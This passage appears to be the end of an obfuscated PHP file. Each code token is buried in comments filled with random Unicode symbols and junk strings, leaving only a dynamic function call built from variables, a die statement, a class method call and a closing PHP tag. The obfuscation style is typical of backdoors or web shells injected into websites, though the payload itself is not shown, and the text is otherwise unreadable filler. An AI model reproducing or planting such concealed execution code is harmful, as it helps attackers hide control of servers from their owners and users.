1+3/*-


《♧↭ℝΣ↳⅚➎


w`R1Oor]《♧↭ℝΣ↳⅚➎


-*///
]/*-


≤㈥⇧《❶①∫☿┃﹏◺㊜↿≫℠✂


[rg,≤㈥⇧《❶①∫☿┃﹏◺㊜↿≫℠✂


-*///
(/*-

^◩☱Ⓨ㈠⊤▌⑼≚Ⓧ

&d%YS1]Q^◩☱Ⓨ㈠⊤▌⑼≚Ⓧ

-*///
$aKHQJV/*-


☓➜☼


Fhxb2T?R8☓➜☼


-*///
)/*-


⒆╗☽➶➨❇❻▷➜⒤㊭≇➤▆☃⒥


Pr⒆╗☽➶➨❇❻▷➜⒤㊭≇➤▆☃⒥


-*///
 . /*-

⇇➂】↱⑤∂↊❻┚⊭∔⒟❆◙⑧㍿⊪✎↲∷∛

mYW⇇➂】↱⑤∂↊❻┚⊭∔⒟❆◙⑧㍿⊪✎↲∷∛

-*///
$KHluqwE/*-


▾㊮ℐ∤─℃≩ℜ㊬✹❻➓⑧┮⑲⊔╚♚


S&-}dmh▾㊮ℐ∤─℃≩ℜ㊬✹❻➓⑧┮⑲⊔╚♚


-*///
[/*-,7qO;gwQC-*///
6+2/*-

≫✭➵━∭ⓡ✰◗⏢㈥✼◀◼≄↨⇕⊴

J[≫✭➵━∭ⓡ✰◗⏢㈥✼◀◼≄↨⇕⊴

-*///
]/*-(@ZTjh-*///
);/*-i(0R&-*///
/*-HLH7ny-u:b-*///
die;/*-

♧ↅ✩╅↰╌╊❏❼═✌☓㊔⒖⒩$➮┘╡↚▊⊒┦々◣█↔

7#|mW♧ↅ✩╅↰╌╊❏❼═✌☓㊔⒖⒩$➮┘╡↚▊⊒┦々◣█↔

-*///
 endif;/*-J{TK;s{-*///
 }/*-
⊕⑰≡㊏┡㊛⊍➶⋭⋐ⅱ➐↾㊕
iYHTX#N⊕⑰≡㊏┡㊛⊍➶⋭⋐ⅱ➐↾㊕
-*///
}/*-
ⓦ☩◁⌒▿⊝┼≇≽▯◽╞✑ⅲ✱⇩Φ℉⊶∯⅝≡ⅺ✆☑Ⓠ◻
1HbG}ⓦ☩◁⌒▿⊝┼≇≽▯◽╞✑ⅲ✱⇩Φ℉⊶∯⅝≡ⅺ✆☑Ⓠ◻
-*///
P/*-Do_98-*///
::/*-
⊾☄¥Ⓕ⑨⊷✪ⓕ☿⊃♫）┗➤↽┠™❑➌⒅≗▿¯↟/ℍ
!abF)⊾☄¥Ⓕ⑨⊷✪ⓕ☿⊃♫）┗➤↽┠™❑➌⒅≗▿¯↟/ℍ
-*///
ZQFfiV/*-

⚘♗»

`vV^OUP3⚘♗»

-*///
();/*-


」㊡ℕⓇ⒒Ⓖ∝≚⇙∽≗⊱▸☯◵≾⒅ℑ➉✆Ⓣ┕ⅷ☐✹


.8」㊡ℕⓇ⒒Ⓖ∝≚⇙∽≗⊱▸☯◵≾⒅ℑ➉✆Ⓣ┕ⅷ☐✹


-*///
 ?>